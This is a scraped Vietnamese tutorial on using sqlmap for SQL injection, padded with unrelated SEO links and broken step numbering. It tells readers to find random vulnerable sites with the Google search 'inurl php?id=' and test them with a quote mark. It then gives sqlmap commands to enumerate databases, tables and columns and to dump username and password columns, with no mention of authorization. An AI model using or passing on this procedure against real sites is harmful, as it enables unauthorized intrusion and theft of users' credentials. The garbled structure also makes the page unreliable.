Sử Dụng Sqlmap Là Gì – You Are Being Redirected

SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server.

A. Chuẩn bị

1 OS bất kì đang cài Python 2.7 (Kali Linux đã có sẵn cái này)SQLMAP download tại https://github.com/sqlmapproject/sqlmap (Kali Linux cũng đã có sẵn cái nàyB.

Đang xem: Sqlmap là gì

Xem thêm: Cách Tìm Ước Chung Lớn Nhất Và Các Bước Tìm Ưcln, Ước Số Là Gì

Xem thêm: ” Secure Là Gì – Secure Investment Là Gì

Tìm 1 trang lỗi SQL Injection bất kì trên Google bằng cách tìm kiếm với từ khóa inurl php?id=B1: Mình thu được 1 trang dạng http://www.abc.com/product.php?id=200B2: Thêm 1 dấu ‘ vào cuối địa chỉ và coi xem chuyện gì xảy ra. Nếu giao diện trang bị thay đổi hoặc hiện lỗi như hình thì 80% trang đó bị SQL Injection

*

B3: Mở sqlmap lên và gõ câu lệnh sau để liệt kê danh sách các databasepython sqlmap.py -u http://www.abc.edu.vn/index.php?id=320 –dbs

*

Sau khi list ra tất cả các Database thì các bạn bỏ qua database information_schema nhé. Ở đây Database của trang web là database đang được gạch đỏ

*

B2: Tiến hành trích xuất các bảng trong Database bằng lệnhpython sqlmap.py -u http://www.abc.vn/index.php?id=320 -D tên database –tables

*

B3: Lựa chọn 1 tables mà bạn cần trích xuất thông tin trong đó, sau đó xài lệnh sau để List ra các cột trong đópython sqlmap.py -u http://www.abc.vn/index.php?id=320 -D tên database -T tên bảng –columns

*

Dễ thấy có 2 cột mà chúng ta cần trích xuất đó là cột username/password.

B4: Trích xuất cột username bằng lệnhpython sqlmap.py -u http://www.abc.vn/index.php?id=320 -D tên database -T tên bảng -C tên cột –dump

*

B5: Trích xuất Password cũng bằng câu lệnh tương tựpython sqlmap.py -u http://www.abc.vn/index.php?id=320 -D tên database -T tên bảng -C tên cột –dump

Related Posts